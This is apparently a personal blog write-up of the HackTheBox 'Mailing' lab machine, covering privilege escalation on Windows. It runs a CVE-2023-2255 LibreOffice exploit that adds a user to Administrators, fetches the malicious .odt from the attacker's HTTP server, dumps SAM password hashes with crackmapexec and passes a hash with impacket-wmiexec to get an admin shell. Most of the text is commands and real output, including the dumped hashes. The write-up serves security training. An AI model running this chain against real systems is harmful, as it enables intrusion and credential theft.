https://github.com/elweth-sec/CVE-2023-2255

└──╼ [★]$ cd CVE-2023-2255/
└──╼ [★]$ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add'
File output.odt has been created !

We run the exploit with a command that adds the local user maya to the Administrators group.
This generates an output.odt which we need to open on the target machine; .odt files are opened with LibreOffice.
Now let's start an HTTP server so the target machine can download it.

└──╼ [★]$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

evil-winrm:

*Evil-WinRM* PS C:\Users\maya\Documents> Invoke-WebRequest -Uri "http://10.10.14.26:8000/output.odt" -OutFile "./output.odt"
*Evil-WinRM* PS C:\Users\maya\Documents> ls


Directory: C:\Users\maya\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 4/11/2024 1:24 AM 807 mail.py
-a---- 3/14/2024 4:30 PM 557 mail.vbs
-a---- 8/17/2024 5:07 AM 30526 output.odt

We downloaded it successfully; ls confirms output.odt is there.
Next, let's escalate privileges:

*Evil-WinRM* PS C:\Users\maya\Documents> cd /Imp*
*Evil-WinRM* PS C:\Important Documents> curl -o output.odt 10.10.14.26:8000/output.odt
*Evil-WinRM* PS C:\Important Documents> net users maya
User name maya
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2024-04-12 4:16:20 AM
Password expires Never
Password changeable 2024-04-12 4:16:20 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2024-08-17 6:11:03 AM

Logon hours allowed All

Local Group Memberships *Remote Management Use*Usuarios
*Usuarios de escritori
Global Group memberships *Ninguno
The command completed successfully.

*Evil-WinRM* PS C:\Important Documents> ./output.odt
*Evil-WinRM* PS C:\Important Documents> net users maya
User name maya
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2024-04-12 4:16:20 AM
Password expires Never
Password changeable 2024-04-12 4:16:20 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2024-08-17 6:11:03 AM

Logon hours allowed All

Local Group Memberships *Administradores *Remote Management Use
*Usuarios *Usuarios de escritori
Global Group memberships *Ninguno
The command completed successfully.

I'm not sure why, but running output.odt in Documents under the home directory does not work; it only takes effect when run in C:\Important Documents. Comparing the before and after, user maya's Local Group Memberships now include Administradores.
Next, to log in as localadmin we need that account's hash, which we can get with crackmapexec:

└──╼ [★]$ crackmapexec smb 10.129.231.40 -u maya -p "m4y4ngs4ri" --sam
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file
SMB 10.129.231.40 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.231.40 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.129.231.40 445 MAILING [*] Dumping SAM hashes
SMB 10.129.231.40 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.129.231.40 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.129.231.40 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.129.231.40 445 MAILING [+] Added 6 SAM hashes to the database

We successfully logged in as maya and obtained the hashes of the accounts above stored in the SAM.
Next we can try logging in as localadmin with impacket-wmiexec to get the root flag:

└──╼ [★]$ impacket-wmiexec localadmin@10.129.231.40 -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users
C:\Users>cd localadmin
C:\Users\localadmin>cd Desktop
C:\Users\localadmin\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 9502-BA18

Directory of C:\Users\localadmin\Desktop

2024-04-12 06:10 AM <DIR> .
2024-04-12 06:10 AM <DIR> ..
2024-02-27 05:30 PM 2,350 Microsoft Edge.lnk
2024-08-16 10:41 AM 34 root.txt
2 File(s) 2,384 bytes
2 Dir(s) 4,476,936,192 bytes free

C:\Users\localadmin\Desktop>type root.txt

Once in, the root flag is on localadmin's Desktop. By the way, the shell you get here is cmd, so use cmd commands.

Summary

My first Windows machine was extremely rough; an easy box took me a whole day. I feel there are a lot of concepts I still haven't fully understood, so I relied on many online solutions to get through it, but I still learned a lot. Looks like I need to fill in some knowledge before taking on the next Windows machine QQ

Reference

https://blog.csdn.net/whale_waves/article/details/138896310
https://medium.com/@EnisisTourist/htb-mailing-writeup-walkthrough-dcc8f04159c4

Pwned !!!


  • Title: HackTheBox-Machines Mailing Writeup
  • Author: kazma
  • Created at: 2024-08-15 20:32:40
  • Updated at: 2024-08-17 15:49:16
  • Link: https://kazma.tw/2024/08/15/HackTheBox-Machines-Mailing-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.